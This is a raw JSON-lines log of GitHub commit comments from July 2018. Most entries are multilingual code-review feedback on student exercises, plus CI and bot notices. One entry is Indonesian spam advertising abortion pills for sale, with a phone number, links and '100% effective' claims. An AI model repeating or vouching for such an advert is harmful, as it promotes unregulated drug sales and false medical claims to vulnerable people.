{"id":"7999053208","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29789626,"position":null,"line":null,"path":null,"commit_id":"e3845e150edc4500f3bea2ad915a05c19d96b3fc","created_at":"2018-07-21T19:03:53Z","updated_at":"2018-07-21T19:03:53Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T19:03:53Z"}
{"id":"7999053397","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29789627,"position":13,"line":13,"path":"2/Task1.rb","commit_id":"cdef700e5cb106840c9428532445524c94660eeb","created_at":"2018-07-21T19:04:03Z","updated_at":"2018-07-21T19:04:03Z","author_association":"NONE","body":"В ключах предпочтительней использовать ключи в виде символов, а не строк (:january вместо 'january'). Связано это с тем, что символы работают быстрее строк"}},"created_at":"2018-07-21T19:04:03Z"}
{"id":"7999055193","type":"CommitCommentEvent","actor":{"login":"Altemio"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29789631,"position":1227,"line":814,"path":"The_Seven_Kingdoms/common/laws/succession_laws.txt","commit_id":"aedf2135c6befe42190963415e8a2857e44abc16","created_at":"2018-07-21T19:05:28Z","updated_at":"2018-07-21T19:05:28Z","author_association":"OWNER","body":"@Vierwood as previously discussed you cannot just rip content from other mods without permission!\n\nReplicate the changes if you’re using other peoples stuff as a reference, especially if say it is a benign thing like modified vanilla code, but do not copy and paste! The fact there is residual code means you do not fully understand what you are copying over.\n\nSent from my iPhone\n\n> On Jul 21, 2018, at 12:55, Vierwood <notifications@github.com> wrote:\n> \n> @blackninja9939 yes, some of the laws were copied over. The vanilla files weren't fixing the issue (they should) so I fell back to something I knew would 100% work. The NW_government and de_facto issues are fixed in a forthcoming commit.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-21T19:05:28Z"}
{"id":"7999056358","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29789634,"position":12,"line":12,"path":"2/Task3.rb","commit_id":"cdef700e5cb106840c9428532445524c94660eeb","created_at":"2018-07-21T19:06:26Z","updated_at":"2018-07-21T19:06:26Z","author_association":"NONE","body":"Не советую использовать цикл loop, предпочтительней будет while/until (цикл с условием). К тому же в условии можно записать и вычисление следующего числа.\r\n"}},"created_at":"2018-07-21T19:06:26Z"}
{"id":"7999056553","type":"CommitCommentEvent","actor":{"login":"nikkobautista"},"repo":{"name":"spenserhale/scientist-psr3-journal"},"payload":{"comment":{"id":29789636,"position":17,"line":16,"path":"composer.json","commit_id":"26fc513431710561c9d456d6e79920c5a1acd1ac","created_at":"2018-07-21T19:06:34Z","updated_at":"2018-07-21T19:06:34Z","author_association":"NONE","body":":( At least attribute the code to the original author, you barely changed anything on the code."}},"created_at":"2018-07-21T19:06:34Z"}
{"id":"7999056798","type":"CommitCommentEvent","actor":{"login":"tanertas"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29789637,"position":null,"line":null,"path":null,"commit_id":"4bbe88c14778c9c531c803311c6a78eeb5d910cf","created_at":"2018-07-21T19:06:47Z","updated_at":"2018-07-21T19:06:47Z","author_association":"CONTRIBUTOR","body":"Isn't this mean package couldn't pass the test? I just checked Debian, Gentoo and Arch builds and it seems that only Alpine suffers from this. Had you any chance to investigate the cause of the problem? I'm trying to upgrade it to 1.3.4 but it can't pass the tests. @ncopa "}},"created_at":"2018-07-21T19:06:47Z"}
{"id":"7999057693","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29789641,"position":5,"line":5,"path":"2/Task4.rb","commit_id":"cdef700e5cb106840c9428532445524c94660eeb","created_at":"2018-07-21T19:07:31Z","updated_at":"2018-07-21T19:07:31Z","author_association":"NONE","body":"Можно использовать два метода: each.with_index(1) - где 1 это число-инициализатор счетчика. Тогда не надо будет в коде добавлять эту единицу"}},"created_at":"2018-07-21T19:07:31Z"}
{"id":"7999058115","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29789642,"position":25,"line":25,"path":"2/Task5.rb","commit_id":"cdef700e5cb106840c9428532445524c94660eeb","created_at":"2018-07-21T19:07:56Z","updated_at":"2018-07-21T19:07:56Z","author_association":"NONE","body":"Задание нужно выполнить без библиотеки date"}},"created_at":"2018-07-21T19:07:56Z"}
{"id":"7999059990","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29789643,"position":20,"line":20,"path":"2/Task6.rb","commit_id":"cdef700e5cb106840c9428532445524c94660eeb","created_at":"2018-07-21T19:09:34Z","updated_at":"2018-07-21T19:09:34Z","author_association":"NONE","body":"Тут тоже рекомендую заменить цикл на while/until, а ключи хэша на символы"}},"created_at":"2018-07-21T19:09:34Z"}
{"id":"7999061355","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789645,"position":3,"line":3,"path":"Lesson2/l2_task1_monthes_30.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T19:10:46Z","updated_at":"2018-07-21T19:10:46Z","author_association":"OWNER","body":"ясно..я в общем-то изначально сделал именно с символами - типа jan:, feb: ... и т.д\r\nа потом переделал на строки, т.к. в условии задачи написано: \r\n..В цикле выводить те **месяцы**, у которых количество дней ровно 30.\r\nТ.е. названия месяцев, а не символы с двоеточиями. "}},"created_at":"2018-07-21T19:10:46Z"}
{"id":"7999061401","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29789646,"position":null,"line":null,"path":null,"commit_id":"d4d2c572d5be280e0fd21ebe1c4cdb6ec253b046","created_at":"2018-07-21T19:10:49Z","updated_at":"2018-07-21T19:10:49Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-70](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-70).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-70-tre.pantheonsite.io/)"}},"created_at":"2018-07-21T19:10:49Z"}
{"id":"7999062880","type":"CommitCommentEvent","actor":{"login":"fancymelonub"},"repo":{"name":"mgba-emu/mgba"},"payload":{"comment":{"id":29789647,"position":null,"line":null,"path":null,"commit_id":"8ea524d9e61334d7d94dd12b9f8a1cd84f0b67ec","created_at":"2018-07-21T19:12:07Z","updated_at":"2018-07-21T19:12:07Z","author_association":"NONE","body":"This helped."}},"created_at":"2018-07-21T19:12:07Z"}
{"id":"7999065988","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29789653,"position":21,"line":21,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/Food2Door/HealthyShop.java","commit_id":"f969cc03ac88c4e80a4e2f92eacd747485167c82","created_at":"2018-07-21T19:14:38Z","updated_at":"2018-07-21T19:14:38Z","author_association":"NONE","body":"Będzie błąd jeśli productName nie istnieje w mapie. Brakuje sprawdzenia czy mapa zawiera dany klucz"}},"created_at":"2018-07-21T19:14:38Z"}
{"id":"7999066136","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29789654,"position":19,"line":19,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/Food2Door/NotHealthyShop.java","commit_id":"f969cc03ac88c4e80a4e2f92eacd747485167c82","created_at":"2018-07-21T19:14:45Z","updated_at":"2018-07-21T19:14:45Z","author_association":"NONE","body":"Będzie błąd jeśli productName nie istnieje w mapie. Brakuje sprawdzenia czy mapa zawiera dany klucz"}},"created_at":"2018-07-21T19:14:45Z"}
{"id":"7999066720","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29789656,"position":7,"line":7,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/Food2Door/BuyRequestRetriever.java","commit_id":"f969cc03ac88c4e80a4e2f92eacd747485167c82","created_at":"2018-07-21T19:15:13Z","updated_at":"2018-07-21T19:15:13Z","author_association":"NONE","body":"W zamówieniu nie powinien być ustawiany producent "}},"created_at":"2018-07-21T19:15:13Z"}
{"id":"7999067458","type":"CommitCommentEvent","actor":{"login":"tofra"},"repo":{"name":"kevinpapst/AdminLTEBundle"},"payload":{"comment":{"id":29789659,"position":10,"line":8,"path":"package.json","commit_id":"e9ba0374f1cb952d9c987b5d2f2fd78274c8d3dd","created_at":"2018-07-21T19:15:51Z","updated_at":"2018-07-21T19:15:51Z","author_association":"NONE","body":"You should use 2.7.1 which is the latest chartjs"}},"created_at":"2018-07-21T19:15:51Z"}
{"id":"7999067471","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29789660,"position":15,"line":15,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/Food2Door/ProducentPicker.java","commit_id":"f969cc03ac88c4e80a4e2f92eacd747485167c82","created_at":"2018-07-21T19:15:51Z","updated_at":"2018-07-21T19:15:51Z","author_association":"NONE","body":"W kluczu, zamiast nazwy sklepu, powinna być nazwa produktu"}},"created_at":"2018-07-21T19:15:51Z"}
{"id":"7999068456","type":"CommitCommentEvent","actor":{"login":"raj7desai"},"repo":{"name":"ramyaadina/Family-Tree"},"payload":{"comment":{"id":29789661,"position":38,"line":38,"path":"tree-backend/index.js","commit_id":"781ca8743a0284c9e0d111432d02be76bc72a683","created_at":"2018-07-21T19:16:40Z","updated_at":"2018-07-21T19:16:40Z","author_association":"NONE","body":"I think you should rename books to `person` or something. Code will be a lot more readable"}},"created_at":"2018-07-21T19:16:40Z"}
{"id":"7999069371","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29789662,"position":5,"line":7,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/challenges/Food2Door/FoodOrderDawnload.java","commit_id":"987973735944b06961913377fb069405697a1201","created_at":"2018-07-21T19:17:26Z","updated_at":"2018-07-21T19:17:26Z","author_association":"NONE","body":"Składając zamówienie, nie powinna być podawana nazwa sklepu. Wybór sklepu powinien następować automatycznie w dalszej części procesowania zamówienia"}},"created_at":"2018-07-21T19:17:26Z"}
{"id":"7999069900","type":"CommitCommentEvent","actor":{"login":"raj7desai"},"repo":{"name":"ramyaadina/Family-Tree"},"payload":{"comment":{"id":29789663,"position":52,"line":52,"path":"tree-backend/index.js","commit_id":"781ca8743a0284c9e0d111432d02be76bc72a683","created_at":"2018-07-21T19:17:52Z","updated_at":"2018-07-21T19:17:52Z","author_association":"NONE","body":"Put your `PORT` as an envelope variable. Read up about environment in node. "}},"created_at":"2018-07-21T19:17:52Z"}
{"id":"7999071124","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29789664,"position":27,"line":25,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/challenges/Food2Door/FoodProcessor.java","commit_id":"987973735944b06961913377fb069405697a1201","created_at":"2018-07-21T19:18:57Z","updated_at":"2018-07-21T19:18:57Z","author_association":"NONE","body":"Mapa nie jest używana. Wartością w mapie powinien być obiekt typu Shop - typ interfejsowy. Konkretne, dodane obiektu do mapy to implementacje tego interfejsu.\r\nKluczem powinny być nazwy produktów"}},"created_at":"2018-07-21T19:18:57Z"}
{"id":"7999071371","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29789665,"position":null,"line":null,"path":null,"commit_id":"4873bb8470b414e1f4189b6082d2ce3ee73fddf0","created_at":"2018-07-21T19:19:10Z","updated_at":"2018-07-21T19:19:10Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-21](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-21-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T19:19:10Z"}
{"id":"7999071565","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29789669,"position":null,"line":null,"path":null,"commit_id":"759e9c18ed941c1b385906c24359c5c1948ddd9c","created_at":"2018-07-21T19:19:22Z","updated_at":"2018-07-21T19:19:22Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1695 of 1695 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-759e9c18ed941c1b385906c24359c5c1948ddd9c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-21T19:19:22Z"}
{"id":"7999072865","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789671,"position":20,"line":20,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T19:20:21Z","updated_at":"2018-07-21T19:20:21Z","author_association":"OWNER","body":"ясно, но я пока еще не знаю этих **each_with_index и each.with_index(n)** методов.. (( "}},"created_at":"2018-07-21T19:20:21Z"}
{"id":"7999073011","type":"CommitCommentEvent","actor":{"login":"raj7desai"},"repo":{"name":"ramyaadina/Family-Tree"},"payload":{"comment":{"id":29789672,"position":48,"line":48,"path":"tree-backend/index.js","commit_id":"781ca8743a0284c9e0d111432d02be76bc72a683","created_at":"2018-07-21T19:20:30Z","updated_at":"2018-07-21T19:20:30Z","author_association":"NONE","body":"What does `x` in the `.then()` do?"}},"created_at":"2018-07-21T19:20:30Z"}
{"id":"7999074222","type":"CommitCommentEvent","actor":{"login":"billaure"},"repo":{"name":"masarisupreme/masarisupreme"},"payload":{"comment":{"id":29789673,"position":5,"line":96,"path":"src/cryptonote_config.h","commit_id":"8995e31e3fc3d10d60762a910d44ece914cab273","created_at":"2018-07-21T19:21:35Z","updated_at":"2018-07-21T19:21:35Z","author_association":"COLLABORATOR","body":"@billiri "}},"created_at":"2018-07-21T19:21:35Z"}
{"id":"7999074407","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29789674,"position":null,"line":null,"path":null,"commit_id":"7f0f750caf002274293625a37f0aa4f638707635","created_at":"2018-07-21T19:21:46Z","updated_at":"2018-07-21T19:21:46Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-330](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-330).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-330-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T19:21:46Z"}
{"id":"7999083760","type":"CommitCommentEvent","actor":{"login":"mondalaci"},"repo":{"name":"UltimateHackingKeyboard/firmware"},"payload":{"comment":{"id":29789687,"position":14,"line":326,"path":"right/src/usb_report_updater.c","commit_id":"a2866feb77f5a79b99824381c02715b12ace52e9","created_at":"2018-07-21T19:29:41Z","updated_at":"2018-07-21T19:29:41Z","author_association":"MEMBER","body":"Your code actually looks right. Sorry for the oversight on my part."}},"created_at":"2018-07-21T19:29:41Z"}
{"id":"7999083912","type":"CommitCommentEvent","actor":{"login":"WillburHolt"},"repo":{"name":"asuite/2018theme"},"payload":{"comment":{"id":29789688,"position":null,"line":null,"path":null,"commit_id":"761bcffd354fc3deb1876d7ab09b6540bac1bc61","created_at":"2018-07-21T19:29:50Z","updated_at":"2018-07-21T19:29:50Z","author_association":"CONTRIBUTOR","body":"Finished & simplified displaying post author"}},"created_at":"2018-07-21T19:29:50Z"}
{"id":"7999084269","type":"CommitCommentEvent","actor":{"login":"Iqbal147"},"repo":{"name":"Iqbal147/iqbal"},"payload":{"comment":{"id":29789690,"position":null,"line":null,"path":null,"commit_id":"f32e77244852b346568876124ce2f2f26a81829f","created_at":"2018-07-21T19:30:07Z","updated_at":"2018-07-21T19:30:07Z","author_association":"OWNER","body":"CAMT-3 # Done"}},"created_at":"2018-07-21T19:30:07Z"}
{"id":"7999084776","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29789694,"position":35,"line":35,"path":"Lesson2/l2_task6_products.rb","commit_id":"ccbd04c2a4c8a0c9350e410aac8529dfbc54762a","created_at":"2018-07-21T19:30:25Z","updated_at":"2018-07-21T19:30:25Z","author_association":"OWNER","body":"вообще не понял. что значит **все \"в одном стиле\"**\r\nпример пожалуста приведите."}},"created_at":"2018-07-21T19:30:25Z"}
{"id":"7999084850","type":"CommitCommentEvent","actor":{"login":"WillburHolt"},"repo":{"name":"asuite/2018theme"},"payload":{"comment":{"id":29789695,"position":null,"line":null,"path":null,"commit_id":"58936923712b82c9eec8d6f2e4795d834377d2dc","created_at":"2018-07-21T19:30:29Z","updated_at":"2018-07-21T19:30:29Z","author_association":"CONTRIBUTOR","body":"Added support for custom excerpts"}},"created_at":"2018-07-21T19:30:29Z"}
{"id":"7999085018","type":"CommitCommentEvent","actor":{"login":"cahsaru1234"},"repo":{"name":"forum/sm-downloads"},"payload":{"comment":{"id":29789696,"position":null,"line":null,"path":null,"commit_id":"ec603ca910f34027dbedd04e96be8770696705b5","created_at":"2018-07-21T19:30:37Z","updated_at":"2018-07-21T19:30:37Z","author_association":"NONE","body":"Jual obat aborsi 100% manjur. Informasi lebih lanjut Hub 082244058007 atau kunjungi www.penggugurkandunganasli.com\r\n\r\n\r\n[URL=https://goo.gl/QJ6yhf]Jual Obat Aborsi Surabaya Resep Dokter Wa. 082244058007[/URL]\r\n[URL=https://klinik-aborsiaman.com/jual-obat-aborsi-samarinda/]Jual Obat Aborsi Samarinda 100% gugur Wa. 082244058007[/URL]\r\n"}},"created_at":"2018-07-21T19:30:37Z"}
{"id":"7999085033","type":"CommitCommentEvent","actor":{"login":"TiM-Sofar"},"repo":{"name":"TiM-Sofar/Self-Learning-Sheet-for-Markdown"},"payload":{"comment":{"id":29789697,"position":null,"line":null,"path":null,"commit_id":"e1f9ef73f948d802087009c2a0d33240cbbf9e55","created_at":"2018-07-21T19:30:38Z","updated_at":"2018-07-21T19:30:38Z","author_association":"OWNER","body":"# Day One:\r\n# Learning Objectives\r\n## 1. What is github\r\n## 2.  Why should we use it\r\n## 3. Demonstration of a github account \r\n## 4. How to Create/Edit repository and Edit it \r\n## 5. (#) Tag for Heading\r\n## 6. Ordered List (1.)\r\n## 7. Un-orderen List (*)\r\n"}},"created_at":"2018-07-21T19:30:38Z"}
{"id":"7999085805","type":"CommitCommentEvent","actor":{"login":"Iqbal147"},"repo":{"name":"Iqbal147/iqbal"},"payload":{"comment":{"id":29789698,"position":null,"line":null,"path":null,"commit_id":"f32e77244852b346568876124ce2f2f26a81829f","created_at":"2018-07-21T19:31:14Z","updated_at":"2018-07-21T19:31:14Z","author_association":"OWNER","body":"CAMT-3#Done"}},"created_at":"2018-07-21T19:31:14Z"}
{"id":"7999086302","type":"CommitCommentEvent","actor":{"login":"paulmsmith"},"repo":{"name":"dwp/design-repository"},"payload":{"comment":{"id":29789699,"position":null,"line":null,"path":null,"commit_id":"57abdc7a4a61ae4a6ff0473416afd47553c78f69","created_at":"2018-07-21T19:31:37Z","updated_at":"2018-07-21T19:31:37Z","author_association":"CONTRIBUTOR","body":"How rude! ;) "}},"created_at":"2018-07-21T19:31:37Z"}
{"id":"7999087434","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29789701,"position":null,"line":null,"path":null,"commit_id":"9dc879a93c7cb1d262d3934e08b19f5a08210318","created_at":"2018-07-21T19:32:30Z","updated_at":"2018-07-21T19:32:30Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-73](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-73).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-73-tre.pantheonsite.io/)"}},"created_at":"2018-07-21T19:32:30Z"}
{"id":"7999088704","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29789707,"position":null,"line":null,"path":null,"commit_id":"0a3204754e0facc4e69a116dc3b78d2824298d67","created_at":"2018-07-21T19:33:32Z","updated_at":"2018-07-21T19:33:32Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-332](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-332).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-332-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T19:33:32Z"}
{"id":"7999089724","type":"CommitCommentEvent","actor":{"login":"oadams"},"repo":{"name":"persephone-tools/persephone"},"payload":{"comment":{"id":29789708,"position":null,"line":null,"path":null,"commit_id":"8862bc2ddefbd6330021e282dd176752e06aa8a8","created_at":"2018-07-21T19:34:19Z","updated_at":"2018-07-21T19:34:19Z","author_association":"COLLABORATOR","body":"Done."}},"created_at":"2018-07-21T19:34:19Z"}
{"id":"7999091830","type":"CommitCommentEvent","actor":{"login":"marcopaganini"},"repo":{"name":"OsProgramadores/op-desafios"},"payload":{"comment":{"id":29789710,"position":null,"line":null,"path":null,"commit_id":"1c37ea8775c258ee038bf67c33d73b6c2d53d000","created_at":"2018-07-21T19:36:09Z","updated_at":"2018-07-21T19:36:09Z","author_association":"CONTRIBUTOR","body":"Voce prefere que eu aprove o commit pela contribuição (e permita o submit do programa errado) ou prefere consertar antes?"}},"created_at":"2018-07-21T19:36:09Z"}
{"id":"7999093929","type":"CommitCommentEvent","actor":{"login":"aki-ks"},"repo":{"name":"apache/maven"},"payload":{"comment":{"id":29789715,"position":null,"line":null,"path":null,"commit_id":"4567c8319e95d58e258e9a8c2067ed9bbe01b58e","created_at":"2018-07-21T19:37:51Z","updated_at":"2018-07-21T19:37:51Z","author_association":"NONE","body":"Why was the getter also deprecated if only injecting (= setter) dependencies should be prohibited?"}},"created_at":"2018-07-21T19:37:51Z"}
{"id":"7999097810","type":"CommitCommentEvent","actor":{"login":"aki-ks"},"repo":{"name":"apache/maven"},"payload":{"comment":{"id":29789721,"position":null,"line":null,"path":null,"commit_id":"4567c8319e95d58e258e9a8c2067ed9bbe01b58e","created_at":"2018-07-21T19:41:07Z","updated_at":"2018-07-21T19:41:07Z","author_association":"NONE","body":"... And what method should now be used instead of the getter?\r\nThe `getArtifacts()` returns just an empty list.\r\n\r\n(I'm not the only one facing this issue... https://stackoverflow.com/questions/51144969/maven-plugin-api-projectdependenciesresolver-is-marked-as-deprecated-how-to-ge)"}},"created_at":"2018-07-21T19:41:07Z"}
{"id":"7999101534","type":"CommitCommentEvent","actor":{"login":"kevinpapst"},"repo":{"name":"kevinpapst/AdminLTEBundle"},"payload":{"comment":{"id":29789725,"position":10,"line":8,"path":"package.json","commit_id":"e9ba0374f1cb952d9c987b5d2f2fd78274c8d3dd","created_at":"2018-07-21T19:43:58Z","updated_at":"2018-07-21T19:43:58Z","author_association":"OWNER","body":"Not yet, the original AdminLTE ships with this version and people using it would need to upgrade their JS with an update => massive BC break.\r\nOnce I have the time to update to the latest AdminLTE version I will update the Chart.js as well. You can create a Feature request, so it won't be lost."}},"created_at":"2018-07-21T19:43:58Z"}
{"id":"7999103769","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29789729,"position":null,"line":null,"path":null,"commit_id":"52d23aa185e34783d79d8d2e5d4f0b7255bc9305","created_at":"2018-07-21T19:45:38Z","updated_at":"2018-07-21T19:45:38Z","author_association":"CONTRIBUTOR","body":"Bête de somme ou animal de bât, c'est kif-kif."}},"created_at":"2018-07-21T19:45:38Z"}
{"id":"7999106523","type":"CommitCommentEvent","actor":{"login":"AzZureman"},"repo":{"name":"alexnester94/smartSoftTask"},"payload":{"comment":{"id":29789732,"position":10,"line":10,"path":"src/main/java/ru/nesteria/db/dbFunctions/DBActions.java","commit_id":"0f6264d1d3c0d7c672e2fc25268f68ecb912c995","created_at":"2018-07-21T19:48:03Z","updated_at":"2018-07-21T19:48:03Z","author_association":"NONE","body":"И зачем этот метод, если он все записи в sout выводит?"}},"created_at":"2018-07-21T19:48:03Z"}
{"id":"7999107638","type":"CommitCommentEvent","actor":{"login":"harpreetminhas"},"repo":{"name":"harpreetminhas/alien-world"},"payload":{"comment":{"id":29789734,"position":null,"line":null,"path":null,"commit_id":"a2034184b0b6b799a61aaac68876c151a37505c6","created_at":"2018-07-21T19:48:57Z","updated_at":"2018-07-21T19:48:57Z","author_association":"OWNER","body":"its second time"}},"created_at":"2018-07-21T19:48:57Z"}
{"id":"7999107710","type":"CommitCommentEvent","actor":{"login":"AzZureman"},"repo":{"name":"alexnester94/smartSoftTask"},"payload":{"comment":{"id":29789735,"position":6,"line":6,"path":"src/main/java/ru/nesteria/db/dbFunctions/DBActions.java","commit_id":"0f6264d1d3c0d7c672e2fc25268f68ecb912c995","created_at":"2018-07-21T19:49:01Z","updated_at":"2018-07-21T19:49:01Z","author_association":"NONE","body":"константах слова должны разделяться нижним подчеркиванием:\r\n**SELECT_USERS_AND_FORMS_LAST_HOUR** "}},"created_at":"2018-07-21T19:49:01Z"}
{"id":"7999108244","type":"CommitCommentEvent","actor":{"login":"ahmedelgabri"},"repo":{"name":"filipekiss/vimfiles"},"payload":{"comment":{"id":29789739,"position":4,"line":6,"path":"after/plugin/UltiSnips.vim","commit_id":"1453496d201b24eecedd42280850ec0d7a2b8fee","created_at":"2018-07-21T19:49:27Z","updated_at":"2018-07-21T19:49:27Z","author_association":"NONE","body":"I'm failing to understand what is this actually doing & what problem it solves with ncm2?"}},"created_at":"2018-07-21T19:49:27Z"}
{"id":"7999110792","type":"CommitCommentEvent","actor":{"login":"jaredpalmer"},"repo":{"name":"jaredpalmer/formik"},"payload":{"comment":{"id":29789742,"position":31,"line":257,"path":"src/Formik.tsx","commit_id":"c1c4733a419c76ff9820596d5d081d83d48b4d7c","created_at":"2018-07-21T19:51:33Z","updated_at":"2018-07-21T19:51:33Z","author_association":"OWNER","body":"Nice."}},"created_at":"2018-07-21T19:51:33Z"}
{"id":"7999112053","type":"CommitCommentEvent","actor":{"login":"aikar"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":29789748,"position":null,"line":null,"path":null,"commit_id":"d0cd5b3b2355d4ac9cdeeb80bb49f2510df39731","created_at":"2018-07-21T19:52:36Z","updated_at":"2018-07-21T19:52:36Z","author_association":"MEMBER","body":"Slight note to my commit note, this is mainly to help recover entities that actually were not a duplicate, but happened to be assigned the same UUID.\r\n\r\nI should of used duplicate UUID more in the commit message, and not 'duplicate entity'"}},"created_at":"2018-07-21T19:52:36Z"}
{"id":"7999112254","type":"CommitCommentEvent","actor":{"login":"NXVXRRE"},"repo":{"name":"projectLUNAR/Hardwick"},"payload":{"comment":{"id":29789750,"position":3,"line":1,"path":"Procfile","commit_id":"6d1ce54e70ba392b9031b57c9e8ea0b324c27fde","created_at":"2018-07-21T19:52:46Z","updated_at":"2018-07-21T19:52:46Z","author_association":"CONTRIBUTOR","body":"Unsure if it needs to be this. It might work without node.js being called and app.js being called as an arg."}},"created_at":"2018-07-21T19:52:46Z"}
